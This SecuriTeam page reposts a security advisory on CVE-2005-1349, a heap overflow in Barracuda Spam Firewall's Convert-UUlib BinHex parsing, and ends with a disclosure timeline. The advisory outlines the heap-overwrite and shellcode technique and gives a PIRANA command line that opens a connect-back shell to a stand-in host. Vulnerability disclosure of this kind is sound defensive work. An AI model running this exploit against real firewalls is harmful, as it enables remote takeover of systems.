Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2005-1349 to a friend New vulnerability? New tool? Tell us	CVE-2005-1349 Barracuda Spam Firewall Convert-UUlib Library Buffer Overflow     Credit: The information has been provided by Jean-S bastien Guay-Leroux. The original article can be found at: http://www.guay-leroux.com/projects/barracuda-advisory-convert-uulib.txt Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2005-1349 Details Check for CVE-2005-1349 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Barracuda Firewall with firmware releases before versions 3.3.15.026. The flaw is in the part of the code where BinHex files were getting parsed. By supplying an invalid size for the resource fork or data fork in a BinHex's file header, it is possible to create a heap overflow. By taking advantage of the sequentials calls to free(), it's possible to overwrite more than 4 bytes. In fact, we can write a jmpcode in memory that will jump to one of our registers containing the location of our shellcode. By using this technique, the exploit will be much more reliable. You will only need to supply a return location address to the exploit code. You do NOT need to have remote administration access (on port 8000) for successfull exploitation. For further informations about the details of the bugs, check the exploit code. Proof of concept: Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the Convert-UUlib vulnerability. The version 0.3.1 of the PIRANA framework incorporates a new module to exploit the Convert-UUlib library bug. It contains three hardcoded offsets that should reliably exploit every Barracuda Spam Firewall with a firmware below 3.3.15.026 and virus definition below 2.0.325. By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234: perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \ -l 1.2.3.4 -p 1234 CVE Information: CVE-2005-1349 Disclosure Timeline:  * 2005-04-26 - Bug is disclosed by Mark Martinec and Robert Lewis.  * 2006-08-?? - Convert-UUlib module exploit written for PIRANA.  * 2006-11-28 - Barracuda Networks is notified about the problem.  * 2006-11-28 - Barracuda Networks acknowledged the problem.  * 2006-11-29 - Barracuda Networks published a fix.  * 2006-12-05 - Advisory is disclosed to the public.  Comments on CVE-2005-1349:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®